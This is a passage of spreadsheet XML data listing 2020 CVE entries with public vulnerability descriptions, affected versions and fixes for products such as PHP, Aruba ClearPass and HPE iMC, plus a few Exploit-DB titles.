    <t>Codologic Codoforum through 4.8.4 allows stored XSS in the login area. This is relevant in conjunction with CVE-2020-5842 because session cookies lack the HttpOnly flag. The impact is account takeover.</t>
  </si>
  <si>
    <t>CVE-2020-7052</t>
  </si>
  <si>
    <t>CODESYS Control V3, Gateway V3, and HMI V3 before 3.5.15.30 allow uncontrolled memory allocation which can result in a remote denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-7053</t>
  </si>
  <si>
    <t>In the Linux kernel 4.14 longterm through 4.14.165 and 4.19 longterm through 4.19.96 (and 5.x before 5.2), there is a use-after-free (write) in the i915_ppgtt_close function in drivers/gpu/drm/i915/i915_gem_gtt.c, aka CID-7dc40713618c. This is related to i915_gem_context_destroy_ioctl in drivers/gpu/drm/i915/i915_gem_context.c.</t>
  </si>
  <si>
    <t>CVE-2020-7054</t>
  </si>
  <si>
    <t>MmsValue_decodeMmsData in mms/iso_mms/server/mms_access_result.c in libIEC61850 through 1.4.0 has a heap-based buffer overflow when parsing the MMS_BIT_STRING data type.</t>
  </si>
  <si>
    <t>CVE-2020-7055</t>
  </si>
  <si>
    <t>An issue was discovered in Elementor 2.7.4. Arbitrary file upload is possible in the Elementor Import Templates function, allowing an attacker to execute code via a crafted ZIP archive.</t>
  </si>
  <si>
    <t>CVE-2020-7057</t>
  </si>
  <si>
    <t>Hikvision DVR DS-7204HGHI-F1 V4.0.1 build 180903 Web Version sends a different response for failed ISAPI/Security/sessionLogin/capabilities login attempts depending on whether the user account exists, which might make it easier to enumerate users. However, only about 4 or 5 failed logins are allowed.</t>
  </si>
  <si>
    <t>CVE-2020-7058</t>
  </si>
  <si>
    <t>** DISPUTED ** data_input.php in Cacti 1.2.8 allows remote code execution via a crafted Input String to Data Collection -&gt; Data Input Methods -&gt; Unix -&gt; Ping Host. NOTE: the vendor has stated "This is a false alarm."</t>
  </si>
  <si>
    <t>CVE-2020-7059</t>
  </si>
  <si>
    <t>When using fgetss() function to read data with stripping tags, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause this function to read past the allocated buffer. This may lead to information disclosure or crash.</t>
  </si>
  <si>
    <t>CVE-2020-7060</t>
  </si>
  <si>
    <t>When using certain mbstring functions to convert multibyte encodings, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause function mbfl_filt_conv_big5_wchar to read past the allocated buffer. This may lead to information disclosure or crash.</t>
  </si>
  <si>
    <t>CVE-2020-7061</t>
  </si>
  <si>
    <t>In PHP versions 7.3.x below 7.3.15 and 7.4.x below 7.4.3, while extracting PHAR files on Windows using phar extension, certain content inside PHAR file could lead to one-byte read past the allocated buffer. This could potentially lead to information disclosure or crash.</t>
  </si>
  <si>
    <t>CVE-2020-7062</t>
  </si>
  <si>
    <t>In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when using file upload functionality, if upload progress tracking is enabled, but session.upload_progress.cleanup is set to 0 (disabled), and the file upload fails, the upload procedure would try to clean up data that does not exist and encounter null pointer dereference, which would likely lead to a crash.</t>
  </si>
  <si>
    <t>CVE-2020-7063</t>
  </si>
  <si>
    <t>In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when creating PHAR archive using PharData::buildFromIterator() function, the files are added with default permissions (0666, or all access) even if the original files on the filesystem were with more restrictive permissions. This may result in files having more lax permissions than intended when such archive is extracted.</t>
  </si>
  <si>
    <t>CVE-2020-7064</t>
  </si>
  <si>
    <t>In PHP versions 7.2.x below 7.2.9, 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while parsing EXIF data with exif_read_data() function, it is possible for malicious data to cause PHP to read one byte of uninitialized memory. This could potentially lead to information disclosure or crash.</t>
  </si>
  <si>
    <t>CVE-2020-7065</t>
  </si>
  <si>
    <t>In PHP versions 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while using mb_strtolower() function with UTF-32LE encoding, certain invalid strings could cause PHP to overwrite stack-allocated buffer. This could lead to memory corruption, crashes and potentially code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7066</t>
  </si>
  <si>
    <t>In PHP versions 7.2.x below 7.2.29, 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while using get_headers() with user-supplied URL, if the URL contains zero (\0) character, the URL will be silently truncated at it. This may cause some software to make incorrect assumptions about the target of the get_headers() and possibly send some information to a wrong server.</t>
  </si>
  <si>
    <t>CVE-2020-7067</t>
  </si>
  <si>
    <t>In PHP versions 7.2.x below 7.2.30, 7.3.x below 7.3.17 and 7.4.x below 7.4.5, if PHP is compiled with EBCDIC support (uncommon), urldecode() function can be made to access locations past the allocated memory, due to erroneously using signed numbers as array indexes.</t>
  </si>
  <si>
    <t>CVE-2020-7068</t>
  </si>
  <si>
    <t>In PHP versions 7.2.x below 7.2.33, 7.3.x below 7.3.21 and 7.4.x below 7.4.9, while processing PHAR files using phar extension, phar_parse_zipfile could be tricked into accessing freed memory, which could lead to a crash or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-7069</t>
  </si>
  <si>
    <t>In PHP versions 7.2.x below 7.2.34, 7.3.x below 7.3.23 and 7.4.x below 7.4.11, when AES-CCM mode is used with openssl_encrypt() function with 12 bytes IV, only first 7 bytes of the IV is actually used. This can lead to both decreased security and incorrect encryption data.</t>
  </si>
  <si>
    <t>CVE-2020-7070</t>
  </si>
  <si>
    <t>In PHP versions 7.2.x below 7.2.34, 7.3.x below 7.3.23 and 7.4.x below 7.4.11, when PHP is processing incoming HTTP cookie values, the cookie names are url-decoded. This may lead to cookies with prefixes like __Host confused with cookies that decode to such prefix, thus leading to an attacker being able to forge cookie which is supposed to be secure. See also CVE-2020-8184 for more information.</t>
  </si>
  <si>
    <t>CVE-2020-7071</t>
  </si>
  <si>
    <t>In PHP versions 7.3.x below 7.3.26, 7.4.x below 7.4.14 and 8.0.0, when validating URL with functions like filter_var($url, FILTER_VALIDATE_URL), PHP will accept an URL with invalid password as valid URL. This may lead to functions that rely on URL being valid to mis-parse the URL and produce wrong data as components of the URL.</t>
  </si>
  <si>
    <t>CVE-2020-7079</t>
  </si>
  <si>
    <t>An improper signature validation vulnerability in Autodesk Dynamo BIM versions 2.5.1 and 2.5.0 may lead to code execution through maliciously crafted DLL files.</t>
  </si>
  <si>
    <t>CVE-2020-7080</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the Autodesk FBX-SDK versions 2019.0 and earlier may lead to arbitrary code execution on a system running it.</t>
  </si>
  <si>
    <t>CVE-2020-7081</t>
  </si>
  <si>
    <t>A type confusion vulnerability in the Autodesk FBX-SDK versions 2019.0 and earlier may lead to arbitary code read/write on the system running it.</t>
  </si>
  <si>
    <t>CVE-2020-7082</t>
  </si>
  <si>
    <t>A use-after-free vulnerability in the Autodesk FBX-SDK versions 2019.0 and earlier may lead to code execution on a system running it.</t>
  </si>
  <si>
    <t>CVE-2020-7083</t>
  </si>
  <si>
    <t>An intager overflow vulnerability in the Autodesk FBX-SDK versions 2019.0 and earlier may lead to denial of service of the application.</t>
  </si>
  <si>
    <t>CVE-2020-7084</t>
  </si>
  <si>
    <t>A NULL pointer dereference vulnerability in the Autodesk FBX-SDK versions 2019.0 and earlier may lead to denial of service of the application.</t>
  </si>
  <si>
    <t>CVE-2020-7085</t>
  </si>
  <si>
    <t>A heap overflow vulnerability in the Autodesk FBX-SDK versions 2019.2 and earlier may lead to arbitrary code execution on a system running it.</t>
  </si>
  <si>
    <t>CVE-2020-7104</t>
  </si>
  <si>
    <t>The chained-quiz plugin 1.1.8.1 for WordPress has reflected XSS via the wp-admin/admin-ajax.php total_questions parameter.</t>
  </si>
  <si>
    <t>CVE-2020-7105</t>
  </si>
  <si>
    <t>async.c and dict.c in libhiredis.a in hiredis through 0.14.0 allow a NULL pointer dereference because malloc return values are unchecked.</t>
  </si>
  <si>
    <t>CVE-2020-7106</t>
  </si>
  <si>
    <t>Cacti 1.2.8 has stored XSS in data_sources.php, color_templates_item.php, graphs.php, graph_items.php, lib/api_automation.php, user_admin.php, and user_group_admin.php, as demonstrated by the description parameter in data_sources.php (a raw string from the database that is displayed by $header to trigger the XSS).</t>
  </si>
  <si>
    <t>CVE-2020-7107</t>
  </si>
  <si>
    <t>The Ultimate FAQ plugin before 1.8.30 for WordPress allows XSS via Display_FAQ to Shortcodes/DisplayFAQs.php.</t>
  </si>
  <si>
    <t>CVE-2020-7108</t>
  </si>
  <si>
    <t>The LearnDash LMS plugin before 3.1.2 for WordPress allows XSS via the ld-profile search field.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48030.txt</t>
  </si>
  <si>
    <t>WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-7109</t>
  </si>
  <si>
    <t>The Elementor Page Builder plugin before 2.8.4 for WordPress does not sanitize data during creation of a new template.</t>
  </si>
  <si>
    <t>CVE-2020-7110</t>
  </si>
  <si>
    <t>ClearPass is vulnerable to Stored Cross Site Scripting by allowing a malicious administrator, or a compromised administrator account, to save malicious scripts within ClearPass that could be executed resulting in a privilege escalation attack. Resolution: Fixed in 6.7.13, 6.8.4, 6.9.0 and higher.</t>
  </si>
  <si>
    <t>CVE-2020-7111</t>
  </si>
  <si>
    <t>A server side injection vulnerability exists which could allow an authenticated administrative user to achieve Remote Code Execution in ClearPass. Resolution: Fixed in 6.7.13, 6.8.4, 6.9.0 and higher.</t>
  </si>
  <si>
    <t>CVE-2020-7113</t>
  </si>
  <si>
    <t>A vulnerability was found when an attacker, while communicating with the ClearPass management interface, is able to intercept and change parameters in the HTTP packets resulting in the compromise of some of ClearPass' service accounts. Resolution: Fixed in 6.7.10, 6.8.1, 6.9.0 and higher.</t>
  </si>
  <si>
    <t>CVE-2020-7114</t>
  </si>
  <si>
    <t>A vulnerability exists allowing attackers, when present in the same network segment as ClearPass' management interface, to make changes to certain databases in ClearPass by crafting HTTP packets. As a result of this attack, a possible complete cluster compromise might occur. Resolution: Fixed in 6.7.13, 6.8.4, 6.9.0 and higher.</t>
  </si>
  <si>
    <t>CVE-2020-7115</t>
  </si>
  <si>
    <t>The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then execute an exploit that would allow to remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher.</t>
  </si>
  <si>
    <t>exploits/linux/remote/48661.sh</t>
  </si>
  <si>
    <t>Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution</t>
  </si>
  <si>
    <t>2020-07-10</t>
  </si>
  <si>
    <t>CVE-2020-7116</t>
  </si>
  <si>
    <t>The ClearPass Policy Manager WebUI administrative interface has an authenticated command remote execution. When the attacker is already authenticated to the administrative interface, they could then exploit the system, leading to remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher.</t>
  </si>
  <si>
    <t>CVE-2020-7117</t>
  </si>
  <si>
    <t>CVE-2020-7119</t>
  </si>
  <si>
    <t>A vulnerability exists in the Aruba Analytics and Location Engine (ALE) web management interface 2.1.0.2 and earlier firmware that allows an already authenticated administrative user to arbitrarily modify files as an underlying privileged operating system user.</t>
  </si>
  <si>
    <t>CVE-2020-7120</t>
  </si>
  <si>
    <t>A local authenticated buffer overflow vulnerability was discovered in Aruba ClearPass Policy Manager version(s): Prior to 6.9.5, 6.8.8-HF1, 6.7.14-HF1. A vulnerability in ClearPass OnGuard could allow local authenticated users to cause a buffer overflow condition. A successful exploit could allow a local attacker to execute arbitrary code within the context the binary is running in, which is a lower privileged account.</t>
  </si>
  <si>
    <t>CVE-2020-7121</t>
  </si>
  <si>
    <t>Two memory corruption vulnerabilities in the Aruba CX Switches Series 6200F, 6300, 6400, 8320, 8325, and 8400 have been found. Successful exploitation of these vulnerabilities could result in Local Denial of Service of the LLDP (Link Layer Discovery Protocol) process in the switch. This applies to firmware versions prior to 10.04.3021.</t>
  </si>
  <si>
    <t>CVE-2020-7122</t>
  </si>
  <si>
    <t>Two memory corruption vulnerabilities in the Aruba CX Switches Series 6200F, 6300, 6400, 8320, 8325, and 8400 have been found. Successful exploitation of these vulnerabilities could result in Local Denial of Service of the CDP (Cisco Discovery Protocol) process in the switch. This applies to firmware versions prior to 10.04.1000.</t>
  </si>
  <si>
    <t>CVE-2020-7123</t>
  </si>
  <si>
    <t>A local escalation of privilege vulnerability was discovered in Aruba ClearPass Policy Manager version(s) prior to 6.9.5, 6.8.9, 6.7.14-HF1. Aruba has released patches for Aruba ClearPass Policy Manager that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-7124</t>
  </si>
  <si>
    <t>A remote unauthorized access vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2.</t>
  </si>
  <si>
    <t>CVE-2020-7125</t>
  </si>
  <si>
    <t>A remote escalation of privilege vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2.</t>
  </si>
  <si>
    <t>CVE-2020-7126</t>
  </si>
  <si>
    <t>A remote server-side request forgery (ssrf) vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2.</t>
  </si>
  <si>
    <t>CVE-2020-7127</t>
  </si>
  <si>
    <t>A remote unauthenticated arbitrary code execution vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2.</t>
  </si>
  <si>
    <t>CVE-2020-7128</t>
  </si>
  <si>
    <t>CVE-2020-7129</t>
  </si>
  <si>
    <t>CVE-2020-7130</t>
  </si>
  <si>
    <t>HPE OneView Global Dashboard (OVGD) 1.9 has a remote information disclosure vulnerability. HPE OneView Global Dashboard - After Upgrade or Install of OVGD Version 1.9, Appliance Firewall May Leave Ports Open. This is resolved in OVGD 1.91 or later.</t>
  </si>
  <si>
    <t>CVE-2020-7131</t>
  </si>
  <si>
    <t>This document describes a security vulnerability in Blade Maintenance Entity, Integrated Maintenance Entity and Maintenance Entity products. All J/H-series NonStop systems have a security vulnerability associated with an open UDP port 17185 on the Maintenance LAN which could result in information disclosure, denial-of-service attacks or local memory corruption against the affected system and a complete control of the system may also be possible. This vulnerability exists only if one gains access to the Maintenance LAN to which Blade Maintenance Entity, Integrated Maintenance Entity or Maintenance Entity product is connected. **Workaround:** Block the UDP port 17185(In the Maintenance LAN Network Switch/Firewall). Fix: Install following SPRs, which are already available: * T1805A01^AAI (Integrated Maintenance Entity) * T4805A01^AAZ (Blade Maintenance Entity). These SPRs are also usable with the following RVUs: * J06.19.00 ? J06.23.01. No fix planned for the following RVUs: J06.04.00 ? J06.18.01. No fix planned for H-Series NonStop systems. No fix planned for the product T2805 (Maintenance Entity).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-7132</t>
  </si>
  <si>
    <t>A potential security vulnerability has been identified in HPE Onboard Administrator. The vulnerability could be remotely exploited to allow Reflected Cross Site Scripting. HPE has made the following software updates and mitigation information to resolve the vulnerability in HPE Onboard Administrator. * OA 4.95 (Linux and Windows).</t>
  </si>
  <si>
    <t>CVE-2020-7133</t>
  </si>
  <si>
    <t>A unauthorized remote access vulnerability was discovered in HPE IOT + GCP version(s): 1.4.0, 1.4.1, 1.4.2, 1.2.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-7134</t>
  </si>
  <si>
    <t>A remote access to sensitive data vulnerability was discovered in HPE IOT + GCP version(s): 1.4.0, 1.4.1, 1.4.2, 1.2.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-7135</t>
  </si>
  <si>
    <t>A potential security vulnerability has been identified in the disk drive firmware installers named Supplemental Update / Online ROM Flash Component on HPE servers running Linux. The vulnerable software is included in the HPE Service Pack for ProLiant (SPP) releases 2018.06.0, 2018.09.0, and 2018.11.0. The vulnerable software is the Supplemental Update / Online ROM Flash Component for Linux (x64) software. The installer in this software component could be locally exploited to execute arbitrary code. Drive Models can be found in the Vulnerability Resolution field of the security bulletin. The 2019_03 SPP and Supplemental update / Online ROM Flash Component for Linux (x64) after 2019.03.0 has fixed this issue.</t>
  </si>
  <si>
    <t>CVE-2020-7136</t>
  </si>
  <si>
    <t>A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).</t>
  </si>
  <si>
    <t>CVE-2020-7137</t>
  </si>
  <si>
    <t>A validation issue in HPE Superdome Flex's RMC component may allow local elevation of privilege. Apply HPE Superdome Flex Server version 3.25.46 or later to resolve this issue.</t>
  </si>
  <si>
    <t>CVE-2020-7138</t>
  </si>
  <si>
    <t>Potential remote code execution security vulnerabilities have been identified with HPE Nimble Storage systems that could be exploited by an attacker to gain elevated privileges on the array. The following NimbleOS versions, and all subsequent releases, contain a software fix for this vulnerability: 3.9.3.0 4.5.6.0 5.0.9.0 5.1.4.100</t>
  </si>
  <si>
    <t>CVE-2020-7139</t>
  </si>
  <si>
    <t>Potential remote access security vulnerabilities have been identified with HPE Nimble Storage systems that could be exploited by an attacker to access and modify sensitive information on the system. The following NimbleOS versions, and all subsequent releases, contain a software fix for this vulnerability: 3.9.3.0 4.5.6.0 5.0.9.0 5.1.4.100</t>
  </si>
  <si>
    <t>CVE-2020-7140</t>
  </si>
  <si>
    <t>A security vulnerability in HPE IceWall SSO Dfw and Dgfw (Domain Gateway Option) could be exploited remotely to cause a remote cross-site scripting (XSS). HPE has provided the following information to resolve this vulnerability in HPE IceWall SSO DFW and Dgfw: https://www.hpe.com/jp/icewall_patchaccess</t>
  </si>
  <si>
    <t>CVE-2020-7141</t>
  </si>
  <si>
    <t>A adddevicetoview expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7142</t>
  </si>
  <si>
    <t>A eventinfo_content expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7143</t>
  </si>
  <si>
    <t>A faultdevparasset expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7144</t>
  </si>
  <si>
    <t>A comparefilesresult expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7145</t>
  </si>
  <si>
    <t>A chooseperfview expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7146</t>
  </si>
  <si>
    <t>A devgroupselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7147</t>
  </si>
  <si>
    <t>A deployselectbootrom expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7148</t>
  </si>
  <si>
    <t>A deployselectsoftware expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7149</t>
  </si>
  <si>
    <t>A ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7150</t>
  </si>
  <si>
    <t>A faultstatchoosefaulttype expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7151</t>
  </si>
  <si>
    <t>A faulttrapgroupselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7152</t>
  </si>
  <si>
    <t>A faultparasset expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7153</t>
  </si>
  <si>
    <t>A iccselectdevtype expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7154</t>
  </si>
  <si>
    <t>A ifviewselectpage expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7155</t>
  </si>
  <si>
    <t>A select expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7156</t>
  </si>
  <si>
    <t>A faultinfo_content expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7157</t>
  </si>
  <si>
    <t>A selviewnavcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7158</t>
  </si>
  <si>
    <t>A perfselecttask expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7159</t>
  </si>
  <si>
    <t>A customtemplateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7160</t>
  </si>
  <si>
    <t>A iccselectdeviceseries expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7161</t>
  </si>
  <si>
    <t>A reporttaskselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7162</t>
  </si>
  <si>
    <t>A operatorgroupselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7163</t>
  </si>
  <si>
    <t>A navigationto expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7164</t>
  </si>
  <si>
    <t>A operationselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7165</t>
  </si>
  <si>
    <t>A iccselectcommand expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7166</t>
  </si>
  <si>
    <t>A operatorgrouptreeselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7167</t>
  </si>
  <si>
    <t>A quicktemplateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7168</t>
  </si>
  <si>
    <t>A selectusergroup expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7169</t>
  </si>
  <si>
    <t>CVE-2020-7170</t>
  </si>
  <si>
    <t>CVE-2020-7171</t>
  </si>
  <si>
    <t>A guidatadetail expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7172</t>
  </si>
  <si>
    <t>A templateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7173</t>
  </si>
  <si>
    <t>A actionselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7174</t>
  </si>
  <si>
    <t>A soapconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7175</t>
  </si>
  <si>
    <t>A iccselectdymicparam expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7176</t>
  </si>
  <si>
    <t>A viewtaskresultdetailfact expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7177</t>
  </si>
  <si>
    <t>A wmiconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7178</t>
  </si>
  <si>
    <t>A mediaforaction expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7179</t>
  </si>
  <si>
    <t>A thirdpartyperfselecttask expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7180</t>
  </si>
  <si>
    <t>A ictexpertdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7181</t>
  </si>
  <si>
    <t>A smsrulesdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7182</t>
  </si>
  <si>
    <t>A sshconfig expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7183</t>
  </si>
  <si>
    <t>A forwardredirect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7184</t>
  </si>
  <si>
    <t>A viewbatchtaskresultdetailfact expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7185</t>
  </si>
  <si>
    <t>A tvxlanlegend expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7186</t>
  </si>
  <si>
    <t>A powershellconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7187</t>
  </si>
  <si>
    <t>A reportpage index expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7188</t>
  </si>
  <si>
    <t>A userselectpagingcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7189</t>
  </si>
  <si>
    <t>A faultflasheventselectfact expression language injectionremote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7190</t>
  </si>
  <si>
    <t>A deviceselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7191</t>
  </si>
  <si>
    <t>A devsoftsel expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
  <si>
    <t>CVE-2020-7192</t>
  </si>
  <si>
    <t>A devicethresholdconfig expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).</t>
  </si>
